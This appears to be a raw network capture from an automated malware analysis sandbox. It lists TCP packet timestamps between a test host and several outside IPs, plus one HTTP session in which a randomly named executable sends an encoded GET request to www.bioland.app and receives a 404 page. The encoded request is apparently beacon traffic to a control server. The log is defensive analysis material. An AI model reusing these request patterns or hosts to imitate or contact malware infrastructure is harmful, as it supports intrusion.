                                                                                      Nov 25, 2024 13:58:31.188426971 CET804975766.29.137.10192.168.2.8
                                                                                      Nov 25, 2024 13:58:32.464726925 CET804975766.29.137.10192.168.2.8
                                                                                      Nov 25, 2024 13:58:32.464755058 CET804975766.29.137.10192.168.2.8
                                                                                      Nov 25, 2024 13:58:32.464768887 CET804975766.29.137.10192.168.2.8
                                                                                      Nov 25, 2024 13:58:32.464782000 CET804975766.29.137.10192.168.2.8
                                                                                      Nov 25, 2024 13:58:32.464793921 CET804975766.29.137.10192.168.2.8
                                                                                      Nov 25, 2024 13:58:32.464806080 CET804975766.29.137.10192.168.2.8
                                                                                      Nov 25, 2024 13:58:32.464816093 CET804975766.29.137.10192.168.2.8
                                                                                      Nov 25, 2024 13:58:32.464828014 CET804975766.29.137.10192.168.2.8
                                                                                      Nov 25, 2024 13:58:32.464842081 CET804975766.29.137.10192.168.2.8
                                                                                      Nov 25, 2024 13:58:32.464854956 CET804975766.29.137.10192.168.2.8
                                                                                      Nov 25, 2024 13:58:32.464881897 CET4975780192.168.2.866.29.137.10
                                                                                      Nov 25, 2024 13:58:32.464956045 CET4975780192.168.2.866.29.137.10
                                                                                      Nov 25, 2024 13:58:32.472887039 CET4975780192.168.2.866.29.137.10
                                                                                      Nov 25, 2024 13:58:32.593205929 CET804975766.29.137.10192.168.2.8
                                                                                      Nov 25, 2024 13:58:37.973120928 CET4975880192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:38.093199015 CET804975837.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:38.097078085 CET4975880192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:38.112246037 CET4975880192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:38.491647959 CET4975880192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:38.705523968 CET804975837.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:38.705765009 CET804975837.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:39.618489981 CET4975880192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:39.740149975 CET804975837.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:39.740457058 CET4975880192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:40.636917114 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:40.757477999 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:40.757560968 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:40.774378061 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:40.894397974 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.163389921 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.163436890 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.163454056 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.163470030 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.163496017 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.163511038 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.163527966 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.163542986 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.163558006 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.163574934 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.163649082 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.166618109 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.283670902 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.283776045 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.283900023 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.287906885 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.291358948 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.364281893 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.364531994 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.364617109 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.368479967 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.368535042 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.368598938 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.368598938 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.374948978 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.375005007 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.375041008 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.375072002 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.383404016 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.383505106 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.383570910 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.383626938 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.391789913 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.391875982 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.391905069 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.391987085 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.400146008 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.400343895 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.400412083 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.408600092 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.408663034 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.408716917 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.409112930 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.416990042 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.417128086 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.417133093 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.417177916 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.425477982 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.425549030 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:42.425612926 CET804975937.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:42.425684929 CET4975980192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:43.309247017 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:43.429323912 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:43.429420948 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:43.448046923 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:43.568097115 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:43.568120956 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.833441973 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.833461046 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.833530903 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:44.833605051 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.833616972 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.833630085 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.833642006 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.833659887 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.833661079 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:44.833669901 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.833688021 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:44.833709002 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.833724976 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.833738089 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:44.833760023 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:44.953769922 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.953874111 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.953996897 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:44.957901955 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.957964897 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:44.958020926 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:44.960623026 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:45.055682898 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:45.055742979 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:45.055757046 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:45.055814981 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:45.059880972 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:45.059930086 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:45.061599016 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:45.061639071 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:45.061660051 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:45.061696053 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:45.070090055 CET804976037.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:45.070132971 CET4976080192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.202718019 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.205704927 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.205821037 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.206021070 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.208946943 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.209067106 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.209189892 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.212223053 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.212403059 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.212563992 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.215557098 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.215609074 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.216018915 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.218782902 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.218894005 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.218903065 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.222115993 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.222188950 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.222671986 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.225370884 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.225483894 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.225862026 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.228701115 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.228800058 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.228864908 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.231944084 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.232065916 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.232249975 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.235240936 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.235369921 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.235589027 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.238667011 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.238805056 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.238867044 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.241930962 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.245718002 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.307303905 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.307394981 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.307934999 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.308547974 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.308657885 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.308762074 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.310910940 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.311019897 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.311278105 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.313313007 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.313421011 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.313606024 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.315792084 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.315856934 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.316358089 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.318079948 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.318198919 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.318742990 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.320415974 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.320585966 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.320864916 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.322856903 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.322983027 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.323193073 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.324984074 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.325151920 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.326863050 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.327198029 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.327301979 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.327459097 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.329401970 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.329514980 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.329642057 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.331621885 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.331742048 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.333772898 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.333878040 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.334017992 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.334017992 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.336168051 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.336213112 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.336292028 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.338104010 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.338310957 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.340186119 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.340301991 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.340457916 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.342223883 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.342334032 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.344120026 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.344397068 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.344469070 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.344710112 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.346379995 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.346482038 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.346767902 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.348722935 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.348730087 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.348788977 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.350620985 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.350763083 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.352453947 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.352583885 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.353650093 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.353650093 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.354466915 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.354579926 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.354777098 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.356448889 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.356564045 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.357153893 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.358413935 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.358535051 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.358692884 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.360354900 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.360466957 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.360582113 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.361839056 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.361964941 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.362246037 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.362700939 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.362812042 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.363894939 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.363976955 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.364047050 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.365086079 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.365156889 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.365917921 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.366429090 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.366528988 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.366985083 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.367547035 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.367671967 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.368699074 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.368774891 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.368940115 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.369702101 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.369812012 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.370243073 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.370901108 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.371017933 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.372052908 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.372221947 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.372272015 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.373035908 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.373337030 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.373456955 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.373732090 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.374386072 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.374510050 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.374706030 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.375591040 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.375684023 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.375864983 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.376740932 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.376863956 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.377101898 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.377931118 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.378000021 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.378267050 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.379076958 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.379179001 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.380270958 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.380404949 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.380405903 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.381463051 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.381544113 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.381721020 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.382592916 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.382714987 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.383491039 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.383835077 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:48.386678934 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.390115976 CET4976180192.168.2.837.140.192.206
                                                                                      Nov 25, 2024 13:58:48.510035038 CET804976137.140.192.206192.168.2.8
                                                                                      Nov 25, 2024 13:58:54.156981945 CET4976280192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:54.276909113 CET8049762199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:54.277059078 CET4976280192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:54.294629097 CET4976280192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:54.415258884 CET8049762199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:55.373055935 CET8049762199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:55.373173952 CET8049762199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:55.373189926 CET8049762199.59.243.227192.168.2.8
                                                                                      Nov 25, 2024 13:58:55.373234987 CET4976280192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:55.373279095 CET4976280192.168.2.8199.59.243.227
                                                                                      Nov 25, 2024 13:58:55.804229975 CET4976280192.168.2.8199.59.243.227
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49714 | 202.61.233.66 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:55:47.803599119 CET | 509 | OUT | GET /0322/?YvA4=xnL8AvI8CJiPEDU&UbRxm=HxR1FeZHXJ7BSqCS3fD8mQxxaJumBZenc9dO7nNnWiW1TdG8ymlkgtRZzCsH8EsCxrgxn7fyxa4U+0BCWK8lvrgV1wD4C6X04kpiBTwqtuBdGQan/Ge0WLc1tZ3QEOC6mw== HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.bioland.app
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Nov 25, 2024 13:55:49.066917896 CET | 1069 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 25 Nov 2024 12:55:48 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 808
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Last-Modified: Thu, 20 Jun 2024 14:25:06 GMT
                                                                                      ETag: "328-61b5314d78b6f"
                                                                                      Accept-Ranges: bytes
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.css"></head><body><div class="page"> <div class="main"> <h1>Server Error</h1> <div class="error-code">404</div> <h2>Page Not Found</h2> <p class="lead">This page either doesn't exist, or it moved somewhere else.</p> <hr/> <p>That's what you can do</p> <div class="help-actions"> <a href="javascript:location.reload();">Reload Page</a> <a href="javascript:history.back();">Back to Previous Page</a> <a href="/">Home Page</a> </div> </div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49716 | 172.67.129.38 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
